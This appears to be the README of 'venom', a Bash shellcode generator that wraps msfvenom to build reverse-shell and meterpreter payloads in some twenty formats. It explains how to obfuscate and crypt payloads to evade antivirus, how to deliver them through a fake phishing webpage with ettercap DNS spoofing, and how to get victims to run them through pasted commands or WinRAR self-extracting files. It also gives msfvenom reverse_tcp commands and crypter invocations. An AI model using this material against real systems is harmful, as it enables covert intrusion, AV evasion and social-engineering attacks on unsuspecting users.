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venom - shellcode generator 1.0.12

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option build target format output
1 shellcode unix C C
2 shellcode windows C DLL
3 shellcode windows DLL DLL
4 shellcode windows C PYTHON/EXE
5 shellcode windows C EXE
6 shellcode windows PSH-CMD EXE
7 shellcode windows C RUBY
8 shellcode windows MSIEXEC MSI
9 shellcode windows POWERSHELL BAT(b64)
10 shellcode windows HTA-PSH HTA(b64)
11 shellcode windows PSH-CMD PS1(b64)
12 shellcode windows PSH-CMD BAT(b64)
13 shellcode windows VBS VBS(shikata+ancii)
14 shellcode windows PSH-CMD VBS
15 shellcode windows PSH-CMD/C PDF
16 shellcode webserver PHP PHP(b64)
17 shellcode multi OS PYTHON PYTHON(b64)
18 shellcode multi OS JAVA JAR(rce)
19 web_delivery multi OS PYTHON/PSH PYTHON/BAT(b64)
20 shellcode android DALVIK APK

VENOM 1.0.12 - metasploit Shellcode generator/compiler/listener
Author: [ r00t-3xp10it ]
Suspicious-Shell-Activity (SSA) RedTeam develop @2016
Codename: black mamba [ GPL licensed ]

Zenity | Metasploit | GCC (compiler) | Pyinstaller (compiler)
mingw32 (compiler) | (crypter) | wine (emulator)
PEScrambler.exe (PE obfuscator) | apache2 (webserver)| winrar
vbs-obfuscator (crypter) | encrypt_PolarSSL (crypter) and
ettercap MitM+DNS_Spoof (venom domain name attack vector) will download/install all dependencies as they are needed
Adicionally as build shell/aux/ to help you install all venom
tool dependencies (metasploit as to be manually installed)
This script will use msfvenom (metasploit) to generate shellcode in
diferent formats ( c | python | ruby | dll | msi | hta | psh | vbs | php | java)
then injects the shellcode generated into one template previous writen
by me (example: python) "the python funtion will execute the shellcode
into RAM" also uses compilers like gcc (gnu cross compiler) or mingw32
or pyinstaller to build the stand-alone executable file, it also starts a
multi-handler to recive the remote connection (shell or meterpreter)
'venom generator' tool reproduces some of the technics used
by,,, etc, etc, etc..
"P.S. some payloads are undetectable by AV soluctions... yes!!!"
One of the reasons for that its the use of a funtion to execute
the 2º stage of shell/meterpreter directly into targets ram
the other reazon its the use of external obfuscators/crypters.
But venom its not a fork of any of this tools because its writen
using Bash contrary to those tools that uses Python, so i can not
copy any funtion writen from any of this tools and past it on my
bash script (obviously), also remmenbering that veil does not
build: [.msi .hta .vbs .ps1 .dll .php .jar ] payload formats...
Remmenber also that software like: pycrypto, pyinstaller, pywin
gcc, mingw32, hiperion, Py2exe, PEScrambler, was not written by
any of the veil developers, i just did the same that veil porting
this softwares to my project to be hable to compile obfuscate
or crypt the shellcode generated by msfvenom...

venom 1.0.11 (malicious_server) was build to take advantage of
apache2 webserver to deliver payloads (lan) using a fake webpage
writen in html that takes advantage of <iframe> <meta-http-equiv><br> or tags to be hable to trigger payload download. Venom also<br> gives you the ability to deliver your payloads in 2 diferent ways:<br> .<br> 1º - run shell/aux/ to config venom domain name<br> attack vector ( thats going to use<br> ettercap (mitm+dns_spoof method) to redirect target traffic<br> to our phishing webpage (IPv&lt;4/6&gt; configuration required)<br> .<br> 2º - use shell/aux/ to delete venom domain name<br> attack vector and force main tool to use default<br> settings (http://<your-ip-adrr>) to deliver payloads using<br> 'social engeneering' technic (send malicious URL to target)<br> .<br> .<br> <strong><a class="alink notfound" href="%20WHAT%20ARE%20THE%20FILES%20INSIDE%20TEMPLATES%20FOLDER%20%3F%20">[ WHAT ARE THE FILES INSIDE TEMPLATES FOLDER ? ]</a></strong><br> The shellcode generated can not be executed by its own...<br> It requires to be embedded into one template (example: batch)<br> to be executed, So the files inside '/shell/templates' are<br> templates previous writen by me using diferent languages like<br> (C, batch, ruby, powershell, python, php, vbscript) to trigger<br> the execution of shellcode directly into targets RAM.<br> .<br> .<br> <strong><a class="alink notfound" href="%20WHAT%20ARE%20THE%20FILES%20TRIGGER.BAT%20FOR%20%3F%20">[ WHAT ARE THE FILES TRIGGER.BAT FOR ? ]</a></strong><br> In some modules venom will build the payload and trigger.bat<br> to 'trigger' the execution of payload when embedded into one<br> winrar/SFX executable file "upon extraction". Venom gives you<br> the ability to 'trigger' your payloads in 3 diferent ways:<br> .<br> 1º - paste the command provided by venom into target cmd<br> 2º - copy bouth files (payload and trigger.bat) to target<br> into the same directory and press twice in trigger.bat<br> 3º - compress bouth files into one WinRar/sfx file<br> send it to target, and press twice to execute it.<br> .<br> .<br> <strong><a class="alink notfound" href="%20BUILDING%20SHELLCODE%20USING%20MSFVENOM%20DOES%20NOT%20FLAG%20AV%20DETECTIONS%20%3F%20">[ BUILDING SHELLCODE USING MSFVENOM DOES NOT FLAG AV DETECTIONS ? ]</a></strong><br> Let's take Veil-Evasion python payload (crypted) as example:<br> 1º - veil uses msfvenom to build shellcode in C format<br> 2º - then it embedded the shellcode source code into one template<br> writen in pyhton language (the funtion will execute shellcode)<br> 3º - uses '' to encrypt the source code with one random<br> AES key + base64 (all together = FUD) "My 'python/exe -&gt; pyherion'<br> module reproduces the same technic, by using the same crypter ;)"<br> .<br> So it depends of the crypters/obfuscators used to scramble the<br> sourcecode and also the ability to execute the 2º stage of shell<br> or meterpreter stager directly into targets ram (not touching disk)<br> Another example is maligno tool that deliver payloads under https<br> (SSL/TLS encrypted comunications) evading better AV detections.<br> 'There are more technics, but they are not reproduced by venom'</p> <p>.<br> .<br> <strong><a class="alink notfound" href="%20HOW%20DOES%20MSFVENOM%20ACTUALLY%20BUILDS%20SHELLCODE%20%3F%20">[ HOW DOES MSFVENOM ACTUALLY BUILDS SHELLCODE ? ]</a></strong><br> The default way to generate a windows binary payload (.exe)<br> using msfvenom is achieved through the -f switch (format) and -o (output name)</p> <div class="codehilite"><pre><span></span><code><span class="n">msfvenom</span> <span class="o">-</span><span class="n">p</span> <span class="n">payload</span><span class="o">-</span><span class="n">name</span> <span class="n">LHOST</span><span class="o">=</span><span class="mf">127.0</span><span class="o">.</span><span class="mf">0.1</span> <span class="n">LPORT</span><span class="o">=</span><span class="mi">666</span> <span class="o">-</span><span class="n">f</span> <span class="n">exe</span> <span class="o">-</span><span class="n">o</span> <span class="n">payload</span><span class="o">.</span><span class="n">exe</span> </code></pre></div> <p>But msfvenom allow us to build shellcode in diferent formats<br> like: asp, aspx, aspx-exe, dll, elf, exe, exe-small, hta-psh<br> macho, osx-app, psh, vba, vba-exe, vba-psh, vbs, bash, c<br> java, perl, powershell, python, ruby, sh, vbscript.<br> The complete list can be accessed using the follow command:</p> <div class="codehilite"><pre><span></span><code>sudo msfvenom --help-formats </code></pre></div> <p>now lets generate a simple shellcode to windows/shell/reverse_tcp<br> chosing powershell as output format "note that we will not use<br> the flag -o (Save the payload) option, this way the shellcode<br> generated will only displays in current terminal windows". </p> <div class="codehilite"><pre><span></span><code>Using powershell as output format: msfvenom -p windows/shell/reverse_tcp LHOST= LPORT=666 -f powershell Using java as output format: msfvenom -p windows/shell/reverse_tcp LHOST= LPORT=666 -f java Using hex as output format: msfvenom -p windows/shell/reverse_tcp LHOST= LPORT=666 -f hex </code></pre></div> <p>.<br> .<br> .<br> <strong><a class="alink notfound" href="%20WHY%20PYINSTALLER%20DOES%20NOT%20WORK%20UNDER%20MY%20DISTRO%20%3F%20">[ WHY PYINSTALLER DOES NOT WORK UNDER MY DISTRO ? ]</a></strong><br> pyinstaller needs certain dependencies to be installed<br> under wine, sutch as: python-2.6.6 and pywin32 to work.<br> the problem is that the dependencies needed must be<br> based into attackers machine arch and chiptech brand<br> (x86 | x64 | AMD | INTEL), for manually install it<br> just unpack 'shell/obfuscate/pyinstaller-2.0.tar.gz'<br> and follow the instructions inside readme-pedr0.txt<br> pyinstaller command used by this script:</p> <div class="codehilite"><pre><span></span><code>su &lt;user_name&gt; -c &#39;pyinstaller --noconsole --onefile &lt;spec_file&gt;&#39; </code></pre></div> <p>.<br> .<br> <strong><a class="alink notfound" href="%20HOW%20CAN%20I%20USE%20PESCRAMBLER.EXE%20%3F%20">[ HOW CAN I USE PESCRAMBLER.EXE ? ]</a></strong><br> PEScrambler.exe is a windows binary executable file<br> and like pyinstaller does not run under 'root user acc'<br> if you wish to use it then open an terminal(normal user)<br> and issue the follow command on it:</p> <div class="codehilite"><pre><span></span><code>su &lt;user_name&gt; -c &#39;wine pescrambler.exe -i &lt;Infile.exe&gt; -o &lt;outfile.exe&gt;&#39; </code></pre></div> <p>(pescrambler.exe does not compile payloads to .exe format<br> it will take an executable.exe and obfuscate the sourcecode<br> to better evade AV detection rate (not very effective now)<br> .<br> .<br> .<br> <strong><a class="alink notfound" href="%20DESCRIPTION%20OF%20NATIVE%20CRYPTERS/COMPILERS%20">[ DESCRIPTION OF NATIVE CRYPTERS/COMPILERS ]</a></strong><br> = Python 'crypter' that builds an dynamic AES/base64<br> encoded launcher (with a random key) that's decoded/decrypted<br> in memory (RAM) and then executed, 'evading AV detection'.</p> <div class="codehilite"><pre><span></span><code>python &lt;; &lt;; </code></pre></div> <p>PEScrambler.exe = crypter to obfuscate an existing .exe</p> <div class="codehilite"><pre><span></span><code>su &lt;user_name&gt; -c &#39;wine pescrambler.exe -i &lt;Infile.exe&gt; -o &lt;outfile.exe&gt;&#39; </code></pre></div> <p> = compile an existing python file into one .exe</p> <div class="codehilite"><pre><span></span><code>su &lt;user_name&gt; -c &#39;pyinstaller --noconsole --onefile &lt;;&#39; </code></pre></div> <p>gcc = gnu cross compiler to build unix executable files</p> <div class="codehilite"><pre><span></span><code>gcc -fno-stack-protector -z execstack &lt;template.c&gt; -o &lt;outfile&gt; </code></pre></div> <p>mingw32 = cross compiler to build .exe executable files</p> <div class="codehilite"><pre><span></span><code>i586-mingw32msvc-gcc &lt;template.c&gt; -o &lt;outfile.exe&gt; -mwindows </code></pre></div> <p>encrypt_solarSSL = encrypt your payloads in base64+AES ramdom key..</p> <div class="codehilite"><pre><span></span><code> <span class="n">python</span> <span class="n">encrypt_payload_polar</span><span class="o">.</span><span class="n">py</span> <span class="o">&lt;</span><span class="n">password</span> <span class="n">to</span> <span class="n">generate</span> <span class="n">AES</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="n">infile</span><span class="o">&gt;</span> </code></pre></div> <p>vbs-obfuscator = encrypt your payload.vbs using ascii (only vbs payloads)</p> <div class="codehilite"><pre><span></span><code> python &lt;inFile.vbs&gt; &lt;outFile.vbs&gt; </code></pre></div> <p>.<br> .<br> .<br> <center><strong><a class="alink notfound" href="%20SPECIAL%20THANKS/CREDITS%20TO%20">[ SPECIAL THANKS/CREDITS TO ]</a>:</strong></center></p> <hr> <p>HD Moore (metasploit father) | Nick Harbour (PEScrambler.exe)<br> @harmj0y (pyherion) | @G0tmi1k <a class="user-mention" href="/u/chris/">@chris</a> truncker @harmj0y (ruby_stager)<br> David Cortesi (pyinstaller) | astr0baby (reflective fud dll injection method)<br> 0entropy (powershell poc's) | Matthew Graeber (powershell poc's)<br> alor&amp;naga (ettercap) | Liviu (encrypt_polarSSL) | Chaitanya (debugging)<br> Suriya Prakash (debugging/recording tutorials)| and offcourse me (r00t-3xp10it) ^_^</p> <hr> <p><center><br> Copyright © 2016 - venom shellcode generator<br> </center></p></iframe>



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